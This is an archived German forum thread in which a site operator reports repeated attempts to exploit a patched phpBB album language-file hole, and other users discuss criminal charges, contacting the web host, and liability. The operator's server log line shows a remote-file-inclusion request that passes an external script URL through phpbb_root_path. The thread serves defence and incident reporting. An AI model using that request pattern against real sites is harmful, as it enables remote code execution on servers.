PDA

Archiv verlassen und diese Seite im Standarddesign anzeigen : Forumhackversuch über deutschen Server



stony_1972
12.01.2009, 23:21
Hallo,

ich schlage mich schon länger mit Hackversuchen auf unser Forum herum. Vor allem sind es Versuche, eine Sicherheitslücke der PHPBB-Forum-Software (Eindringen über ein Language-File), die wir jedoch bereits geschlossen haben, auszunutzen. Entscheidend ist das PHP-Script, das die Datei "lang_main_album.php" angreifen soll. Bisher lag Quelle und Schadscript meistens in USA, Asien oder im östlichen Ausland. Nun habe ich "endlich" einen erwischt, der dieses Schadscript auf einem deutschen Server liegen hat.

Nachstehend ein Eintrag aus unserem Server-Log:

>>>
404 _ 07.01.2009 _ 15:36 _ 207.191.227.90 _ OK _ hosting2.arklahomahosting.com _ /%22%20class=%22neww%22%20target=%22_blank%22%20title=%22Im%20neuen%20Fenster%20ö ffnen//language/lang_german/lang_main_album.php?phpbb_root_path=http://foege.subfraktal.de//modules/MysqlDump/id23.txt??? _ _

Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2
<<<

Ich habe die Betreiber (www.f....de) bzw. (www.s....de) bereits angeschrieben und die Damen und Herren dort zur Löschung des Schadscriptes aufgefordert - bisher ohne Reaktion.

Nun meine Frage: Ist eine Strafanzeige hier sinn- bzw. wirkungsvoll?

Danke für eure Antworten.

Grüße
Stony

Goofy
12.01.2009, 23:56
Hier kommt als Straftatbestand wohl der § 303b StGB (Computersabotage) in Frage.

Dazu ist jedoch Bedingung, dass a) der Vorsatz nachweisbar ist, und b) beweisbar ist, dass der Eindringungsversuch tatsächlich von diesem Server ausging, d.h., dass der Server nicht nur Medium einer fremden Hackerbande war. (Dann wäre m.E. der Verantwortliche für den Server überhaupt nicht strafrechtlich zu belangen.)

Dazu müssten z.B. umfangreiche Logdateien herangezogen werden, und möglichst auch Zeugenaussagen, die die Richtigkeit der Logdateien bestätigen.

Die Beweisführung ist hier m.E. nicht gerade trivial.

Da nun in Deutschland die Staatsanwälte in Bezug auf Wirtschafts- und Computerkriminalität entweder sehr blauäugig oder unengagiert oder auch beides sind, ist es sehr wahrscheinlich, dass das Verfahren eingestellt wird.

Verfahren wegen Computersabotage werden, so weit ich weiß, am ehesten noch bei großen, bedeutenden Fällen durchgezogen - etwa, wenn es einen Einbruch auf einen Firmenserver mit wichtigen Daten gegeben hat.

Diese vielen "kleinen Hackereien", die jeden Tat so abgehen, reißen die StAs, glaube ich, nicht so vom Ofen weg.
Da ist der Stempel mit der Einstellungsverfügung schnell aus der Schublade geholt.

Wenn der Verantwortliche sich ignorant zeigt, solltest Du Dich unbedingt beim zuständigen Webhoster beschweren.
Das wäre in diesem Fall: abuse -at- hosteurope.de.

stony_1972
13.01.2009, 06:47
Vielen Dank für die kompetente Antwort. Das bestätigt, was ich mir im Grunde schon gedacht habe. Werde deinem Rat folgen und Hosteurope informieren.

Grüße
Stony

Sirius
13.01.2009, 08:14
Das Schad-Script scheint da schon eine Weile zu liegen. Google (http://www.google.com/search?q=%22modules+MysqlDump+id23+txt%22&num=100&hl=de&lr=&as_qdr=all&filter=0)hat über 250 Treffer.

Gaston
13.01.2009, 08:24
Goofy, soweit stimme ich Dir zu.
Aber mit der Mitteilung durch stony_1972 haben diese Kenntnis davon und von da ab ist es unerheblich, ob dieser Schad-script von Ihnen verursacht wurde oder nicht! Sie haben dann für Beseitigung des Problems zu sorgen.
Jedenfalls ist dies nach der bisherigen Rechtssprechung, wenn es um Internet und elektronische Medien geht, meine Einschätzung.
Aber, wie wir schon aus mehreren Fällen wissen, wird schneller gehandelt, wenn der Webhoster (der meist von seiner Mithaftung besser bescheID: [ID filtered]

alariel
13.01.2009, 08:54
Stony, HostEurope hast Du mittlerweile informiert? Die Domain liegt in deren IP-Range, also sollten im Zweifel die den befallenen Rechner auch abklemmen können (und/oder müssen). Wohin die Info muss, hat Goofy ja geschrieben.

Den Hoster ziehe ich normalerweise ins Boot, wenn vom Betreiber binnen weniger Stunden keine Antwort kommt. Kann man allerdings auch sofort machen...

exe
13.01.2009, 09:17
Werde deinem Rat folgen und Hosteurope informieren.

Offensichtlich ja.

Mit ähnlichen Angriffen hat jeder Betreiber von Webseiten zu tun. Man braucht die Logfiles des httpd nur mal nach "=http" in der angeforderten Seite zu grepen. Da wird einem regelmäßig richtig übel. :sick: Die Server auf denen die Scripte liegen sind meist selbst gehackt. Dort finden sich in den gleichen Verzeichnissen oft auch noch weitere Tools von den Bösewichten.

Ich würde auch die Jungs von cmsmadesimple.org informieren. Zumindest liegt das Script im Verzeichnis dieses Moduls: http://dev.cmsmadesimple.org/projects/mysqldump - das legt nahe, dass dieses Modul verwundbar sein könnte. Vielleicht ist auch das CMS verwundbar oder dort ist eine alte Version installiert.
http://www.google.de/search?q=cmsmadesimple+exploit

Goofy
13.01.2009, 10:18
Aber mit der Mitteilung durch stony_1972 haben diese Kenntnis davon und von da ab ist es unerheblich, ob dieser Schad-script von Ihnen verursacht wurde oder nicht! Sie haben dann für Beseitigung des Problems zu sorgen.
Jedenfalls ist dies nach der bisherigen Rechtssprechung, wenn es um Internet und elektronische Medien geht, meine Einschätzung.


Selbst, wenn die ignorant sind, ergibt sich daraus m.E. immer noch keine Strafbarkeit. Einen Straftatbestand bzw. eine Ordnungswidrigkeit stellt das Belassen eines ungesicherten, infizierten Rechners im Internet nach deutschem Recht m.W. nicht dar.

Allerdings, und da gebe ich Dir recht, können sich aus der "Ignoranz trotz Kenntnis" durchaus zivilrechtliche Ansprüche ergeben. Etwa, wenn nachgewiesen werden kann, dass nach Kenntnisnahme ein Angriff unter Mißbrauch dieses Servers gegen einen fremden Rechner stattfand. Dann muss sich der ignorante Serverbetreiber u.U. eine Mitstörerhaftung zurechnen lassen und ist für wirtschaftliche Schäden ggf. haftbar.

Das gleiche gilt m.E. für den Webhoster, wenn der den infizierten Server nicht abklemmt, nachdem der Hosting-Kunde Gelegenheit hatte, das Schadskript zu beseitigen.